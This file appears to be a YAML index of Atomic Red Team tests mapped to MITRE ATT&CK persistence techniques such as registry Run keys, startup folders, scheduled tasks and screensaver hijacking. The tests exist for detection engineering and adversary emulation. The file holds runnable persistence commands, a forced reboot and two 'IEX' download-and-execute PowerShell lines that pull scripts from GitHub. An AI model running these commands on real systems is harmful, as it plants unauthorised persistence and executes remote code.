atomic_tests: - - name: Reg Key Run - auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 - description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will - modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output - will be via stdout. \n" - supported_platforms: - - windows - input_arguments: - command_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.exe - executor: - command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V - "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - -' - cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" - /V "Atomic Red Team" /f >nul 2>&1 - -' - name: command_prompt - - name: Reg Key RunOnce - auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb - description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe - will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will - be via stdout. \n" - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /d "#{thing_to_execute}" - -' - cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend - /v 1 /f >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: PowerShell Registry RunOnce - auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 - description: | - RunOnce Key Persistence via PowerShell - Upon successful execution, a new entry will be added to the runonce item in the registry. - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: powershell.exe - reg_key_path: - description: Path to registry key to update - type: Path - default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce - executor: - command: | - $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' - cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" - -Force -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Suspicious vbs file run from startup Folder - auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 - description: "vbs files can be placed in and ran from the startup folder to - maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will - be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" - cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious jse file run from startup Folder - auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 - description: "jse files can be placed in and ran from the startup folder to - maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will - be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start - Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted - and the user logs in.\n" - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" - cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Suspicious bat file run from startup Folder - auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e - description: | - bat files can be placed in and executed from the startup folder to maintain persistance. - Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" - folder and will also run when the computer is restarted and the user logs in. - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" - Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" - cleanup_command: | - Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore - Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Add Executable Shortcut Link to User Startup Folder - auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d - description: 'Adds a non-malicious executable shortcut link to the current users - startup directory. Test can be verified by going to the users startup directory - and checking if the shortcut link exists. ' - supported_platforms: - - windows - executor: - command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation - = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell - = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath - = $Target\n$Create.Save() " - cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start - Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore - name: powershell - elevation_required: true - T1505.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1505.001 - url: https://attack.mitre.org/techniques/T1505/001 - - source_name: NetSPI Startup Stored Procedures - url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ - description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via - SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.' - - source_name: Kaspersky MSSQL Aug 2019 - url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/ - description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote - attack on Microsoft SQL Server. Retrieved September 4, 2019.' - - source_name: Microsoft xp_cmdshell 2017 - url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017 - description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved - September 9, 2019. - - source_name: Microsoft CLR Integration 2017 - url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017 - description: Microsoft. (2017, June 19). Common Language Runtime Integration. - Retrieved July 8, 2019. - - source_name: NetSPI SQL Server CLR - url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/ - description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. - Retrieved July 8, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SQL Stored Procedures - description: "Adversaries may abuse SQL stored procedures to establish persistent - access to systems. SQL Stored Procedures are code that can be saved and reused - so that database users do not waste time rewriting frequently used SQL queries. - Stored procedures can be invoked via SQL statements to the database using - the procedure name or via defined events (e.g. when a SQL server application - is started/restarted).\n\nAdversaries may craft malicious stored procedures - that can provide a persistence mechanism in SQL database servers.(Citation: - NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute - operating system commands through SQL syntax the adversary may have to enable - additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: - NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: - Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language - runtime (CLR) integration. With CLR integration enabled, application developers - can write stored procedures using any .NET framework language (e.g. VB .NET, - C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft - or modify CLR assemblies that are linked to stored procedures since these - CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI - SQL Server CLR) " - id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T23:30:20.638Z' - created: '2019-12-12T14:59:58.168Z' - x_mitre_data_sources: - - Application logs - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - - root - x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: - NetSPI Startup Stored Procedures) Consider enabling audit features that can - log malicious startup activities.' - x_mitre_contributors: - - Carlos Borges, @huntingneo, CIP - - Lucas da Silva Pereira, @vulcanunsec, CIP - - Kaspersky - x_mitre_platforms: - - Windows - - Linux - atomic_tests: [] - T1098.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1098.004 - url: https://attack.mitre.org/techniques/T1098/004 - - source_name: SSH Authorized Keys - url: https://www.ssh.com/ssh/authorized_keys/ - description: ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June - 24, 2020. - - source_name: Venafi SSH Key Abuse - url: https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities - description: 'Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity - Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, - 2020.' - - source_name: Cybereason Linux Exim Worm - url: https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability - description: Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting - Linux Exim Server Vulnerability. Retrieved June 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: SSH Authorized Keys - description: |- - Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. - - Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) - id: attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-06-25T16:32:23.367Z' - created: '2020-06-24T12:42:35.144Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. - - Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_contributors: - - Tony Lambert, Red Canary - x_mitre_platforms: - - Linux - - macOS - identifier: T1098.004 - atomic_tests: - - name: Modify SSH Authorized Keys - auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc - description: "Modify contents of /.ssh/authorized_keys to maintain - persistence on victim host. \nIf the user is able to save the same contents - in the authorized_keys file, it shows user can modify the file.\n" - supported_platforms: - - macos - - linux - executor: - name: bash - elevation_required: false - command: 'if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat - ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; - fi; - -' - cleanup_command: 'unset ssh_authorized_keys - -' - T1053.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.005 - url: https://attack.mitre.org/techniques/T1053/005 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. - source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task - description: |- - Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. - - The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. - - An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). - id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:03.730Z' - created: '2019-11-27T14:58:00.429Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. - - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_platforms: - - Windows - identifier: T1053.005 - atomic_tests: - - name: Scheduled Task Startup Script - auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 - description: | - Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view - the tasks, open the Task Scheduler and look in the Active Tasks pane. - supported_platforms: - - windows - executor: - command: | - schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" - schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" - cleanup_command: | - schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1 - schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1 - name: command_prompt - elevation_required: true - - name: Scheduled task Local - auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 - description: 'Upon successful execution, cmd.exe will create a scheduled task - to spawn cmd.exe at 20:10. - -' - supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - executor: - name: command_prompt - elevation_required: false - command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - -' - - name: Scheduled task Remote - auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd - description: | - Create a task on a remote system. - - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. - supported_platforms: - - windows - input_arguments: - task_command: - description: What you want to execute - type: String - default: C:\windows\system32\cmd.exe - time: - description: What time 24 Hour - type: String - default: 72600 - target: - description: Target - type: String - default: localhost - user_name: - description: 'Username to authenticate with, format: DOMAIN\User' - type: String - default: DOMAIN\user - password: - description: Password to authenticate with - type: String - default: At0micStrong - executor: - name: command_prompt - elevation_required: true - command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN - "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - -' - cleanup_command: 'SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} - /TN "Atomic task" /F >nul 2>&1 - -' - - name: Powershell Cmdlet Scheduled Task - auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd - description: | - Create an atomic scheduled task that leverages native powershell cmdlets. - - Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. - supported_platforms: - - windows - executor: - name: powershell - elevation_required: false - command: | - $Action = New-ScheduledTaskAction -Execute "calc.exe" - $Trigger = New-ScheduledTaskTrigger -AtLogon - $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest - $Set = New-ScheduledTaskSettingsSet - $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set - Register-ScheduledTask AtomicTask -InputObject $object - cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false - >$null 2>&1 - -' - - name: Task Scheduler via VBA - auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 - description: | - This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within - 30 - 40 seconds after this module has run - supported_platforms: - - windows - input_arguments: - ms_product: - description: Maldoc application Word - type: String - default: Word - dependency_executor_name: powershell - dependencies: - - description: 'Microsoft #{ms_product} must be installed - -' - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} - manually to meet this requirement" - -' - executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" - -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" - -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" - name: powershell - - name: WMI Invoke-CimMethod Scheduled Task - auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b - description: 'Create an scheduled task that executes notepad.exe after user - login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing - as Register-ScheduledTask cmdlet behind the scenes. - -' - supported_platforms: - - windows - executor: - name: powershell - elevation_required: true - command: | - $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") - Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } - cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false - >$null 2>&1 - -' - T1053: - technique: - created: '2017-05-31T21:30:46.977Z' - modified: '2020-10-14T15:20:01.069Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Task/Job - description: |- - Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) - - Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). - external_references: - - source_name: mitre-attack - external_id: T1053 - url: https://attack.mitre.org/techniques/T1053 - - external_id: CAPEC-557 - source_name: capec - url: https://capec.mitre.org/data/definitions/557.html - - url: https://technet.microsoft.com/en-us/library/cc785125.aspx - description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved - June 8, 2016. - source_name: TechNet Task Scheduler Security - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Windows - - Linux - - macOS - x_mitre_remote_support: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs - x_mitre_contributors: - - Prashant Verma, Paladion - - Leo Loobeek, @leoloobeek - - Travis Smith, Tripwire - - Alain Homewood, Insomnia Security - x_mitre_version: '2.0' - x_mitre_is_subtechnique: false - atomic_tests: [] - T1546.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.002 - url: https://attack.mitre.org/techniques/T1546/002 - - source_name: Wikipedia Screensaver - description: Wikipedia. (2017, November 22). Screensaver. Retrieved December - 5, 2017. - url: https://en.wikipedia.org/wiki/Screensaver - - source_name: ESET Gazer Aug 2017 - description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage - backdoor. Retrieved September 14, 2017.' - url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Screensaver - description: |- - Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. - - The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: - - * SCRNSAVE.exe - set to malicious PE path - * ScreenSaveActive - set to '1' to enable the screensaver - * ScreenSaverIsSecure - set to '0' to not require a password to unlock - * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed - - Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) - id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-23T12:23:04.955Z' - created: '2020-01-24T13:51:01.210Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. - - Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. - x_mitre_data_sources: - - File monitoring - - Windows Registry - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Bartosz Jerzman - x_mitre_platforms: - - Windows - identifier: T1546.002 - atomic_tests: - - name: Set Arbitrary Binary as Screensaver - auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 - description: 'This test copies a binary into the Windows System32 folder and - sets it as the screensaver so it will execute for persistence. Requires a - reboot and logon. - -' - supported_platforms: - - windows - input_arguments: - input_binary: - description: Executable binary to use in place of screensaver for persistence - type: path - default: C:\Windows\System32\cmd.exe - executor: - command: | - copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f - reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f - shutdown /r /t 0 - name: command_prompt - elevation_required: true - T1547.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.005 - url: https://attack.mitre.org/techniques/T1547/005 - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. - source_name: Microsoft Configure LSA - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Security Support Provider - description: |- - Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. - - The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) - id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:42:48.910Z' - created: '2020-01-24T17:16:11.806Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - 